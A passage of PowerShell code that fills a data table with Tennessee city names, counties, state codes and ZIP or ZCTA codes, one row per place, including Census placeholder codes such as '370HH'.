$Cities.Rows.Add("Lascassas","Rutherford","Tennessee","TN","47","37085") + $null = $Cities.Rows.Add("La vergne","Rutherford","Tennessee","TN","47","37086") + $null = $Cities.Rows.Add("Lebanon","Wilson","Tennessee","TN","47","37087") + $null = $Cities.Rows.Add("Zcta 37090","Wilson","Tennessee","TN","47","37090") + $null = $Cities.Rows.Add("Lewisburg","Marshall","Tennessee","TN","47","37091") + $null = $Cities.Rows.Add("Gassaway","DeKalb","Tennessee","TN","47","37095") + $null = $Cities.Rows.Add("Flatwoods","Perry","Tennessee","TN","47","37096") + $null = $Cities.Rows.Add("Lobelville","Perry","Tennessee","TN","47","37097") + $null = $Cities.Rows.Add("Wrigley","Hickman","Tennessee","TN","47","37098") + $null = $Cities.Rows.Add("Zcta 370hh","Bedford","Tennessee","TN","47","370HH") + $null = $Cities.Rows.Add("Zcta 370xx","Stewart","Tennessee","TN","47","370XX") + $null = $Cities.Rows.Add("Mc ewen","Humphreys","Tennessee","TN","47","37101") + $null = $Cities.Rows.Add("Plaza","Warren","Tennessee","TN","47","37110") + $null = $Cities.Rows.Add("Madison","Davidson","Tennessee","TN","47","37115") + $null = $Cities.Rows.Add("Milton","Rutherford","Tennessee","TN","47","37118") + $null = $Cities.Rows.Add("Mount juliet","Wilson","Tennessee","TN","47","37122") + $null = $Cities.Rows.Add("Zcta 37127","Rutherford","Tennessee","TN","47","37127") + $null = $Cities.Rows.Add("Zcta 37128","Rutherford","Tennessee","TN","47","37128") + $null = $Cities.Rows.Add("Murfreesboro","Rutherford","Tennessee","TN","47","37129") + $null = $Cities.Rows.Add("Murfreesboro","Rutherford","Tennessee","TN","47","37130") + $null = $Cities.Rows.Add("New johnsonville","Humphreys","Tennessee","TN","47","37134") + $null = $Cities.Rows.Add("Nolensville","Williamson","Tennessee","TN","47","37135") + $null = $Cities.Rows.Add("Nunnelly","Hickman","Tennessee","TN","47","37137") + $null = $Cities.Rows.Add("Old hickory","Davidson","Tennessee","TN","47","37138") + $null = $Cities.Rows.Add("Only","Hickman","Tennessee","TN","47","37140") + $null = $Cities.Rows.Add("Orlinda","Robertson","Tennessee","TN","47","37141") + $null = $Cities.Rows.Add("Palmyra","Montgomery","Tennessee","TN","47","37142") + $null = $Cities.Rows.Add("Pegram","Cheatham","Tennessee","TN","47","37143") + $null = $Cities.Rows.Add("Petersburg","Lincoln","Tennessee","TN","47","37144") + $null = $Cities.Rows.Add("Pleasant shade","Smith","Tennessee","TN","47","37145") + $null = $Cities.Rows.Add("Pleasant view","Cheatham","Tennessee","TN","47","37146") + $null = $Cities.Rows.Add("Pleasantville","Hickman","Tennessee","TN","47","37147") + $null = $Cities.Rows.Add("Portland","Sumner","Tennessee","TN","47","37148") + $null = $Cities.Rows.Add("Readyville","Cannon","Tennessee","TN","47","37149") + $null = $Cities.Rows.Add("Red boiling spri","Macon","Tennessee","TN","47","37150") + $null = $Cities.Rows.Add("Riddleton","Smith","Tennessee","TN","47","37151") + $null = $Cities.Rows.Add("Ridgetop","Robertson","Tennessee","TN","47","37152") + $null = $Cities.Rows.Add("Rockvale","Rutherford","Tennessee","TN","47","37153") + $null = $Cities.Rows.Add("Royal","Bedford","Tennessee","TN","47","37160") + $null = $Cities.Rows.Add("Smithville","DeKalb","Tennessee","TN","47","37166") + $null = $Cities.Rows.Add("Smyrna","Rutherford","Tennessee","TN","47","37167") + $null = $Cities.Rows.Add("Southside","Montgomery","Tennessee","TN","47","37171") + $null = $Cities.Rows.Add("Springfield","Robertson","Tennessee","TN","47","37172") + $null = $Cities.Rows.Add("Spring hill","Maury","Tennessee","TN","47","37174") + $null = $Cities.Rows.Add("Stewart","Houston","Tennessee","TN","47","37175") + $null = $Cities.Rows.Add("Tennessee ridge","Houston","Tennessee","TN","47","37178") + $null = $Cities.Rows.Add("Thompsons statio","Williamson","Tennessee","TN","47","37179") + $null = $Cities.Rows.Add("Unionville","Bedford","Tennessee","TN","47","37180") + $null = $Cities.Rows.Add("Vanleer","Dickson","Tennessee","TN","47","37181") + $null = $Cities.Rows.Add("Wartrace","Bedford","Tennessee","TN","47","37183") + $null = $Cities.Rows.Add("Watertown","Wilson","Tennessee","TN","47","37184") + $null = $Cities.Rows.Add("Waverly","Humphreys","Tennessee","TN","47","37185") + $null = $Cities.Rows.Add("Westmoreland","Sumner","Tennessee","TN","47","37186") + $null = $Cities.Rows.Add("White bluff","Dickson","Tennessee","TN","47","37187") + $null = $Cities.Rows.Add("White house","Sumner","Tennessee","TN","47","37188") + $null = $Cities.Rows.Add("Whites creek","Davidson","Tennessee","TN","47","37189") + $null = $Cities.Rows.Add("Woodbury","Cannon","Tennessee","TN","47","37190") + $null = $Cities.Rows.Add("Woodlawn","Montgomery","Tennessee","TN","47","37191") + $null = $Cities.Rows.Add("Zcta 371hh","Bedford","Tennessee","TN","47","371HH") + $null = $Cities.Rows.Add("Zcta 371xx","Grundy","Tennessee","TN","47","371XX") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37201") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37203") + $null = $Cities.Rows.Add("Melrose","Davidson","Tennessee","TN","47","37204") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37205") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37206") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37207") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37208") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37209") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37210") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37211") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37212") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37213") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37214") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37215") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37216") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37217") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37218") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37219") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37220") + $null = $Cities.Rows.Add("Bellevue","Davidson","Tennessee","TN","47","37221") + $null = $Cities.Rows.Add("Nashville","Davidson","Tennessee","TN","47","37228") + $null = $Cities.Rows.Add("Zcta 372hh","Davidson","Tennessee","TN","47","372HH") + $null = $Cities.Rows.Add("Altamont","Grundy","Tennessee","TN","47","37301") + $null = $Cities.Rows.Add("Apison","Hamilton","Tennessee","TN","47","37302") + $null = $Cities.Rows.Add("Athens","McMinn","Tennessee","TN","47","37303") + $null = $Cities.Rows.Add("Beersheba spring","Grundy","Tennessee","TN","47","37305") + $null = $Cities.Rows.Add("Belvidere","Franklin","Tennessee","TN","47","37306") + $null = $Cities.Rows.Add("Benton","Polk","Tennessee","TN","47","37307") + $null = $Cities.Rows.Add("Birchwood","Hamilton","Tennessee","TN","47","37308") + $null = $Cities.Rows.Add("Calhoun","McMinn","Tennessee","TN","47","37309") + $null = $Cities.Rows.Add("Charleston","Bradley","Tennessee","TN","47","37310") + $null = $Cities.Rows.Add("Cleveland","Bradley","Tennessee","TN","47","37311") + $null = $Cities.Rows.Add("Cleveland","Bradley","Tennessee","TN","47","37312") + $null = $Cities.Rows.Add("Coalmont","Grundy","Tennessee","TN","47","37313") + $null = $Cities.Rows.Add("Conasauga","Polk","Tennessee","TN","47","37316") + $null = $Cities.Rows.Add("Postelle","Polk","Tennessee","TN","47","37317") + $null = $Cities.Rows.Add("Cowan","Franklin","Tennessee","TN","47","37318") + $null = $Cities.Rows.Add("Dayton","Rhea","Tennessee","TN","47","37321") + $null = $Cities.Rows.Add("Decatur","Meigs","Tennessee","TN","47","37322") + $null = $Cities.Rows.Add("Cleveland","Bradley","Tennessee","TN","47","37323") + $null = $Cities.Rows.Add("Decherd","Franklin","Tennessee","TN","47","37324") + $null = $Cities.Rows.Add("Delano","Polk","Tennessee","TN","47","37325") + $null = $Cities.Rows.Add("Ducktown","Polk","Tennessee","TN","47","37326") + $null = $Cities.Rows.Add("Dunlap","Sequatchie","Tennessee","TN","47","37327") + $null = $Cities.Rows.Add("Elora","Lincoln","Tennessee","TN","47","37328") + $null = $Cities.Rows.Add("Englewood","McMinn","Tennessee","TN","47","37329") + $null = $Cities.Rows.Add("Estill springs","Franklin","Tennessee","TN","47","37330") + $null = $Cities.Rows.Add("Etowah","McMinn","Tennessee","TN","47","37331") + $null = $Cities.Rows.Add("Evensville","Rhea","Tennessee","TN","47","37332") + $null = $Cities.Rows.Add("Farner","Polk","Tennessee","TN","47","37333") + $null = $Cities.Rows.Add("Fayetteville","Lincoln","Tennessee","TN","47","37334") + $null = $Cities.Rows.Add("Flintville","Lincoln","Tennessee","TN","47","37335") + $null = $Cities.Rows.Add("Georgetown","Bradley","Tennessee","TN","47","37336") + $null = $Cities.Rows.Add("Grandview","Rhea","Tennessee","TN","47","37337") + $null = $Cities.Rows.Add("Graysville","Rhea","Tennessee","TN","47","37338") + $null = $Cities.Rows.Add("Gruetli laager","Grundy","Tennessee","TN","47","37339") + $null = $Cities.Rows.Add("Guild","Marion","Tennessee","TN","47","37340") + $null = $Cities.Rows.Add("Harrison","Hamilton","Tennessee","TN","47","37341") + $null = $Cities.Rows.Add("Hillsboro","Coffee","Tennessee","TN","47","37342") + $null = $Cities.Rows.Add("Hixson","Hamilton","Tennessee","TN","47","37343") + $null = $Cities.Rows.Add("Huntland","Franklin","Tennessee","TN","47","37345") + $null = $Cities.Rows.Add("Kimball","Marion","Tennessee","TN","47","37347") + $null = $Cities.Rows.Add("Kelso","Lincoln","Tennessee","TN","47","37348") + $null = $Cities.Rows.Add("Lookout mountain","Hamilton","Tennessee","TN","47","37350") + $null = $Cities.Rows.Add("Lupton city","Hamilton","Tennessee","TN","47","37351") + $null = $Cities.Rows.Add("Lynchburg","Moore","Tennessee","TN","47","37352") + $null = $Cities.Rows.Add("Mc donald","Bradley","Tennessee","TN","47","37353") + $null = $Cities.Rows.Add("Hiwassee college","Monroe","Tennessee","TN","47","37354") + $null = $Cities.Rows.Add("Manchester","Coffee","Tennessee","TN","47","37355") + $null = $Cities.Rows.Add("Monteagle","Grundy","Tennessee","TN","47","37356") + $null = $Cities.Rows.Add("Morrison","Warren","Tennessee","TN","47","37357") + $null = $Cities.Rows.Add("Mulberry","Lincoln","Tennessee","TN","47","37359") + $null = $Cities.Rows.Add("Normandy","Coffee","Tennessee","TN","47","37360") + $null = $Cities.Rows.Add("Ocoee","Polk","Tennessee","TN","47","37361") + $null = $Cities.Rows.Add("Oldfort","Polk","Tennessee","TN","47","37362") + $null = $Cities.Rows.Add("Ooltewah","Hamilton","Tennessee","TN","47","37363") + $null = $Cities.Rows.Add("Palmer","Grundy","Tennessee","TN","47","37365") + $null = $Cities.Rows.Add("Pelham","Grundy","Tennessee","TN","47","37366") + $null = $Cities.Rows.Add("Pikeville","Bledsoe","Tennessee","TN","47","37367") + $null = $Cities.Rows.Add("Reliance","Polk","Tennessee","TN","47","37369") + $null = $Cities.Rows.Add("Riceville","McMinn","Tennessee","TN","47","37370") + $null = $Cities.Rows.Add("Sale creek","Hamilton","Tennessee","TN","47","37373") + $null = $Cities.Rows.Add("Sequatchie","Marion","Tennessee","TN","47","37374") + $null = $Cities.Rows.Add("Sewanee","Franklin","Tennessee","TN","47","37375") + $null = $Cities.Rows.Add("Sherwood","Franklin","Tennessee","TN","47","37376") + $null = $Cities.Rows.Add("Signal mountain","Hamilton","Tennessee","TN","47","37377") + $null = $Cities.Rows.Add("Soddy daisy","Hamilton","Tennessee","TN","47","37379") + $null = $Cities.Rows.Add("South pittsburg","Marion","Tennessee","TN","47","37380") + $null = $Cities.Rows.Add("Spring city","Rhea","Tennessee","TN","47","37381") + $null = $Cities.Rows.Add("Tellico plains","Monroe","Tennessee","TN","47","37385") + $null = $Cities.Rows.Add("Tracy city","Grundy","Tennessee","TN","47","37387") + $null = $Cities.Rows.Add("Dickel","Coffee","Tennessee","TN","47","37388") + $null = $Cities.Rows.Add("Turtletown","Polk","Tennessee","TN","47","37391") + $null = $Cities.Rows.Add("Viola","Warren","Tennessee","TN","47","37394") + $null = $Cities.Rows.Add("Whiteside","Marion","Tennessee","TN","47","37396") + $null = $Cities.Rows.Add("Whitwell","Marion","Tennessee","TN","47","37397") + $null = $Cities.Rows.Add("Winchester","Franklin","Tennessee","TN","47","37398") + $null = $Cities.Rows.Add("Zcta 373hh","Bradley","Tennessee","TN","47","373HH") + $null = $Cities.Rows.Add("Zcta 373xx","Bledsoe","Tennessee","TN","47","373XX") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37402") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37403") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37404") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37405") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37406") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37407") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37408") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37409") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37410") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37411") + $null = $Cities.Rows.Add("East ridge","Hamilton","Tennessee","TN","47","37412") + $null = $Cities.Rows.Add("Red bank","Hamilton","Tennessee","TN","47","37415") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37416") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37419") + $null = $Cities.Rows.Add("Chattanooga","Hamilton","Tennessee","TN","47","37421") + $null = $Cities.Rows.Add("Zcta 374hh","Hamilton","Tennessee","TN","47","374HH") + $null = $Cities.Rows.Add("Johnson city","Washington","Tennessee","TN","47","37601") + $null = $Cities.Rows.Add("Johnson city","Washington","Tennessee","TN","47","37604") + $null = $Cities.Rows.Add("Johnson city","Washington","Tennessee","TN","47","37614") + $null = $Cities.Rows.Add("Gray","Washington","Tennessee","TN","47","37615") + $null = $Cities.Rows.Add("Afton","Greene","Tennessee","TN","47","37616") + $null = $Cities.Rows.Add("Blountville","Sullivan","Tennessee","TN","47","37617") + $null = $Cities.Rows.Add("Bluff city","Sullivan","Tennessee","TN","47","37618") + $null = $Cities.Rows.Add("Bristol","Sullivan","Tennessee","TN","47","37620") + $null = $Cities.Rows.Add("Butler","Johnson","Tennessee","TN","47","37640") + $null = $Cities.Rows.Add("Chuckey","Greene","Tennessee","TN","47","37641") + $null = $Cities.Rows.Add("Church hill","Hawkins","Tennessee","TN","47","37642") + $null = $Cities.Rows.Add("Elizabethton","Carter","Tennessee","TN","47","37643") + $null = $Cities.Rows.Add("Mount carmel","Hawkins","Tennessee","TN","47","37645") + $null = $Cities.Rows.Add("Erwin","Unicoi","Tennessee","TN","47","37650") + $null = $Cities.Rows.Add("Fall branch","Washington","Tennessee","TN","47","37656") + $null = $Cities.Rows.Add("Flag pond","Unicoi","Tennessee","TN","47","37657") + $null = $Cities.Rows.Add("Hampton","Carter","Tennessee","TN","47","37658") + $null = $Cities.Rows.Add("Jonesborough","Washington","Tennessee","TN","47","37659") + $null = $Cities.Rows.Add("Bloomingdale","Sullivan","Tennessee","TN","47","37660") + $null = $Cities.Rows.Add("Colonial heights","Sullivan","Tennessee","TN","47","37663") + $null = $Cities.Rows.Add("Kingsport","Sullivan","Tennessee","TN","47","37664") + $null = $Cities.Rows.Add("Lynn garden","Sullivan","Tennessee","TN","47","37665") + $null = $Cities.Rows.Add("Laurel bloomery","Johnson","Tennessee","TN","47","37680") + $null = $Cities.Rows.Add("Washington colle","Washington","Tennessee","TN","47","37681") + $null = $Cities.Rows.Add("Mountain city","Johnson","Tennessee","TN","47","37683") + $null = $Cities.Rows.Add("Mtn home","Washington","Tennessee","TN","47","37684") + $null = $Cities.Rows.Add("Piney flats","Sullivan","Tennessee","TN","47","37686") + $null = $Cities.Rows.Add("Roan mountain","Carter","Tennessee","TN","47","37687") + $null = $Cities.Rows.Add("Shady valley","Johnson","Tennessee","TN","47","37688") + $null = $Cities.Rows.Add("Telford","Washington","Tennessee","TN","47","37690") + $null = $Cities.Rows.Add("Trade","Johnson","Tennessee","TN","47","37691") + $null = $Cities.Rows.Add("Unicoi","Unicoi","Tennessee","TN","47","37692") + $null = $Cities.Rows.Add("Watauga","Carter","Tennessee","TN","47","37694") + $null = $Cities.Rows.Add("Zcta 376hh","Carter","Tennessee","TN","47","376HH") + $null = $Cities.Rows.Add("Alcoa","Blount","Tennessee","TN","47","37701") + $null = $Cities.Rows.Add("Andersonville","Anderson","Tennessee","TN","47","37705") + $null = $Cities.Rows.Add("Bean station","Grainger","Tennessee","TN","47","37708") + $null = $Cities.Rows.Add("Blaine","Grainger","Tennessee","TN","47","37709") + $null = $Cities.Rows.Add("Devonia","Anderson","Tennessee","TN","47","37710") + $null = $Cities.Rows.Add("Bulls gap","Hawkins","Tennessee","TN","47","37711") + $null = $Cities.Rows.Add("Bybee","Cocke","Tennessee","TN","47","37713") + $null = $Cities.Rows.Add("Caryville","Campbell","Tennessee","TN","47","37714") + $null = $Cities.Rows.Add("Clairfield","Claiborne","Tennessee","TN","47","37715") + $null = $Cities.Rows.Add("Clinton","Anderson","Tennessee","TN","47","37716") + $null = $Cities.Rows.Add("Coalfield","Morgan","Tennessee","TN","47","37719") + $null = $Cities.Rows.Add("Corryton","Knox","Tennessee","TN","47","37721") + $null = $Cities.Rows.Add("Cosby","Cocke","Tennessee","TN","47","37722") + $null = $Cities.Rows.Add("Crab orchard","Cumberland","Tennessee","TN","47","37723") + $null = $Cities.Rows.Add("Cumberland gap","Claiborne","Tennessee","TN","47","37724") + $null = $Cities.Rows.Add("Dandridge","Jefferson","Tennessee","TN","47","37725") + $null = $Cities.Rows.Add("Deer lodge","Morgan","Tennessee","TN","47","37726") + $null = $Cities.Rows.Add("Del rio","Cocke","Tennessee","TN","47","37727") + $null = $Cities.Rows.Add("Duff","Campbell","Tennessee","TN","47","37729") + $null = $Cities.Rows.Add("Eagan","Claiborne","Tennessee","TN","47","37730") + $null = $Cities.Rows.Add("Eidson","Hawkins","Tennessee","TN","47","37731") + $null = $Cities.Rows.Add("Elgin","Scott","Tennessee","TN","47","37732") + $null = $Cities.Rows.Add("Friendsville","Blount","Tennessee","TN","47","37737") + $null = $Cities.Rows.Add("Gatlinburg","Sevier","Tennessee","TN","47","37738") + $null = $Cities.Rows.Add("Greenback","Loudon","Tennessee","TN","47","37742") + $null = $Cities.Rows.Add("Baileyton","Greene","Tennessee","TN","47","37743") + $null = $Cities.Rows.Add("Greeneville","Greene","Tennessee","TN","47","37744") + $null = $Cities.Rows.Add("Zcta 37745","Greene","Tennessee","TN","47","37745") + $null = $Cities.Rows.Add("Harriman","Roane","Tennessee","TN","47","37748") + $null = $Cities.Rows.Add("Harrogate","Claiborne","Tennessee","TN","47","37752") + $null = $Cities.Rows.Add("Hartford","Cocke","Tennessee","TN","47","37753") + $null = $Cities.Rows.Add("Heiskell","Anderson","Tennessee","TN","47","37754") + $null = $Cities.Rows.Add("Helenwood","Scott","Tennessee","TN","47","37755") + $null = $Cities.Rows.Add("Huntsville","Scott","Tennessee","TN","47","37756") + $null = $Cities.Rows.Add("Jacksboro","Campbell","Tennessee","TN","47","37757") + $null = $Cities.Rows.Add("Jefferson city","Jefferson","Tennessee","TN","47","37760") + $null = $Cities.Rows.Add("Jellico","Campbell","Tennessee","TN","47","37762") + $null = $Cities.Rows.Add("Kingston","Roane","Tennessee","TN","47","37763") + $null = $Cities.Rows.Add("Kodak","Sevier","Tennessee","TN","47","37764") + $null = $Cities.Rows.Add("Kyles ford","Hancock","Tennessee","TN","47","37765") + $null = $Cities.Rows.Add("Morley","Campbell","Tennessee","TN","47","37766") + $null = $Cities.Rows.Add("Lake city","Anderson","Tennessee","TN","47","37769") + $null = $Cities.Rows.Add("Lancing","Morgan","Tennessee","TN","47","37770") + $null = $Cities.Rows.Add("Lenoir city","Loudon","Tennessee","TN","47","37771") + $null = $Cities.Rows.Add("Zcta 37772","Loudon","Tennessee","TN","47","37772") + $null = $Cities.Rows.Add("Loudon","Loudon","Tennessee","TN","47","37774") + $null = $Cities.Rows.Add("Louisville","Blount","Tennessee","TN","47","37777") + $null = $Cities.Rows.Add("Luttrell","Union","Tennessee","TN","47","37779") + $null = $Cities.Rows.Add("Zcta 377hh","Anderson","Tennessee","TN","47","377HH") + $null = $Cities.Rows.Add("Zcta 377xx","Claiborne","Tennessee","TN","47","377XX") + $null = $Cities.Rows.Add("Maryville","Blount","Tennessee","TN","47","37801") + $null = $Cities.Rows.Add("Maryville","Blount","Tennessee","TN","47","37803") + $null = $Cities.Rows.Add("Maryville","Blount","Tennessee","TN","47","37804") + $null = $Cities.Rows.Add("Mascot","Knox","Tennessee","TN","47","37806") + $null = $Cities.Rows.Add("Maynardville","Union","Tennessee","TN","47","37807") + $null = $Cities.Rows.Add("Midway","Greene","Tennessee","TN","47","37809") + $null = $Cities.Rows.Add("Mohawk","Greene","Tennessee","TN","47","37810") + $null = $Cities.Rows.Add("Mooresburg","Hawkins","Tennessee","TN","47","37811") + $null = $Cities.Rows.Add("Morristown","Hamblen","Tennessee","TN","47","37813") + $null = $Cities.Rows.Add("Morristown","Hamblen","Tennessee","TN","47","37814") + $null = $Cities.Rows.Add("Mosheim","Greene","Tennessee","TN","47","37818") + $null = $Cities.Rows.Add("Newcomb","Campbell","Tennessee","TN","47","37819") + $null = $Cities.Rows.Add("New market","Jefferson","Tennessee","TN","47","37820") + $null = $Cities.Rows.Add("Newport","Cocke","Tennessee","TN","47","37821") + $null = $Cities.Rows.Add("New tazewell","Claiborne","Tennessee","TN","47","37825") + $null = $Cities.Rows.Add("Niota","McMinn","Tennessee","TN","47","37826") + $null = $Cities.Rows.Add("Norris","Anderson","Tennessee","TN","47","37828") + $null = $Cities.Rows.Add("Oakdale","Morgan","Tennessee","TN","47","37829") + $null = $Cities.Rows.Add("Oak ridge","Anderson","Tennessee","TN","47","37830") + $null = $Cities.Rows.Add("Oliver springs","Roane","Tennessee","TN","47","37840") + $null = $Cities.Rows.Add("Oneida","Scott","Tennessee","TN","47","37841") + $null = $Cities.Rows.Add("Parrottsville","Cocke","Tennessee","TN","47","37843") + $null = $Cities.Rows.Add("Petros","Morgan","Tennessee","TN","47","37845") + $null = $Cities.Rows.Add("Philadelphia","Loudon","Tennessee","TN","47","37846") + $null = $Cities.Rows.Add("Pioneer","Scott","Tennessee","TN","47","37847") + $null = $Cities.Rows.Add("Powder springs","Grainger","Tennessee","TN","47","37848") + $null = $Cities.Rows.Add("Powell","Knox","Tennessee","TN","47","37849") + $null = $Cities.Rows.Add("Robbins","Scott","Tennessee","TN","47","37852") + $null = $Cities.Rows.Add("Rockford","Blount","Tennessee","TN","47","37853") + $null = $Cities.Rows.Add("Rockwood","Roane","Tennessee","TN","47","37854") + $null = $Cities.Rows.Add("Rogersville","Hawkins","Tennessee","TN","47","37857") + $null = $Cities.Rows.Add("Russellville","Hamblen","Tennessee","TN","47","37860") + $null = $Cities.Rows.Add("Rutledge","Grainger","Tennessee","TN","47","37861") + $null = $Cities.Rows.Add("Sevierville","Sevier","Tennessee","TN","47","37862") + $null = $Cities.Rows.Add("Pigeon forge","Sevier","Tennessee","TN","47","37863") + $null = $Cities.Rows.Add("Seymour","Sevier","Tennessee","TN","47","37865") + $null = $Cities.Rows.Add("Sharps chapel","Union","Tennessee","TN","47","37866") + $null = $Cities.Rows.Add("Sneedville","Hancock","Tennessee","TN","47","37869") + $null = $Cities.Rows.Add("Speedwell","Claiborne","Tennessee","TN","47","37870") + $null = $Cities.Rows.Add("Strawberry plain","Jefferson","Tennessee","TN","47","37871") + $null = $Cities.Rows.Add("Sunbright","Morgan","Tennessee","TN","47","37872") + $null = $Cities.Rows.Add("Surgoinsville","Hawkins","Tennessee","TN","47","37873") + $null = $Cities.Rows.Add("Sweetwater","Monroe","Tennessee","TN","47","37874") + $null = $Cities.Rows.Add("Zcta 37876","Sevier","Tennessee","TN","47","37876") + $null = $Cities.Rows.Add("Talbott","Hamblen","Tennessee","TN","47","37877") + $null = $Cities.Rows.Add("Tallassee","Blount","Tennessee","TN","47","37878") + $null = $Cities.Rows.Add("Tazewell","Claiborne","Tennessee","TN","47","37879") + $null = $Cities.Rows.Add("Ten mile","Meigs","Tennessee","TN","47","37880") + $null = $Cities.Rows.Add("Thorn hill","Grainger","Tennessee","TN","47","37881") + $null = $Cities.Rows.Add("Townsend","Blount","Tennessee","TN","47","37882") + $null = $Cities.Rows.Add("Vonore","Monroe","Tennessee","TN","47","37885") + $null = $Cities.Rows.Add("Walland","Blount","Tennessee","TN","47","37886") + $null = $Cities.Rows.Add("Wartburg","Morgan","Tennessee","TN","47","37887") + $null = $Cities.Rows.Add("Washburn","Grainger","Tennessee","TN","47","37888") + $null = $Cities.Rows.Add("Baneberry","Jefferson","Tennessee","TN","47","37890") + $null = $Cities.Rows.Add("Whitesburg","Hamblen","Tennessee","TN","47","37891") + $null = $Cities.Rows.Add("Winfield","Scott","Tennessee","TN","47","37892") + $null = $Cities.Rows.Add("Zcta 378hh","Anderson","Tennessee","TN","47","378HH") + $null = $Cities.Rows.Add("Zcta 378xx","Claiborne","Tennessee","TN","47","378XX") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37902") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37909") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37912") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37914") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37915") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37916") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37917") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37918") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37919") + $null = $Cities.Rows.Add("Kimberlin height","Knox","Tennessee","TN","47","37920") + $null = $Cities.Rows.Add("Karns","Knox","Tennessee","TN","47","37921") + $null = $Cities.Rows.Add("Concord","Knox","Tennessee","TN","47","37922") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37923") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37924") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37931") + $null = $Cities.Rows.Add("Concord farragut","Knox","Tennessee","TN","47","37932") + $null = $Cities.Rows.Add("Knoxville","Knox","Tennessee","TN","47","37938") + $null = $Cities.Rows.Add("Zcta 379hh","Knox","Tennessee","TN","47","379HH") + $null = $Cities.Rows.Add("Alamo","Crockett","Tennessee","TN","47","38001") + $null = $Cities.Rows.Add("Arlington","Shelby","Tennessee","TN","47","38002") + $null = $Cities.Rows.Add("Atoka","Tipton","Tennessee","TN","47","38004") + $null = $Cities.Rows.Add("Bells","Crockett","Tennessee","TN","47","38006") + $null = $Cities.Rows.Add("Bolivar","Hardeman","Tennessee","TN","47","38008") + $null = $Cities.Rows.Add("Brighton","Tipton","Tennessee","TN","47","38011") + $null = $Cities.Rows.Add("Brownsville","Haywood","Tennessee","TN","47","38012") + $null = $Cities.Rows.Add("Burlison","Tipton","Tennessee","TN","47","38015") + $null = $Cities.Rows.Add("Collierville","Shelby","Tennessee","TN","47","38017") + $null = $Cities.Rows.Add("Cordova","Shelby","Tennessee","TN","47","38018") + $null = $Cities.Rows.Add("Covington","Tipton","Tennessee","TN","47","38019") + $null = $Cities.Rows.Add("Crockett mills","Crockett","Tennessee","TN","47","38021") + $null = $Cities.Rows.Add("Drummonds","Tipton","Tennessee","TN","47","38023") + $null = $Cities.Rows.Add("Dyersburg","Dyer","Tennessee","TN","47","38024") + $null = $Cities.Rows.Add("Eads","Shelby","Tennessee","TN","47","38028") + $null = $Cities.Rows.Add("Finley","Dyer","Tennessee","TN","47","38030") + $null = $Cities.Rows.Add("Friendship","Crockett","Tennessee","TN","47","38034") + $null = $Cities.Rows.Add("Gallaway","Fayette","Tennessee","TN","47","38036") + $null = $Cities.Rows.Add("Gates","Lauderdale","Tennessee","TN","47","38037") + $null = $Cities.Rows.Add("Grand junction","Hardeman","Tennessee","TN","47","38039") + $null = $Cities.Rows.Add("Halls","Lauderdale","Tennessee","TN","47","38040") + $null = $Cities.Rows.Add("Fort pillow","Lauderdale","Tennessee","TN","47","38041") + $null = $Cities.Rows.Add("Hickory valley","Hardeman","Tennessee","TN","47","38042") + $null = $Cities.Rows.Add("Hornsby","Hardeman","Tennessee","TN","47","38044") + $null = $Cities.Rows.Add("La grange","Fayette","Tennessee","TN","47","38046") + $null = $Cities.Rows.Add("Lenox","Dyer","Tennessee","TN","47","38047") + $null = $Cities.Rows.Add("Mason","Tipton","Tennessee","TN","47","38049") + $null = $Cities.Rows.Add("Maury city","Crockett","Tennessee","TN","47","38050") + $null = $Cities.Rows.Add("Middleton","Hardeman","Tennessee","TN","47","38052") + $null = $Cities.Rows.Add("Millington","Shelby","Tennessee","TN","47","38053") + $null = 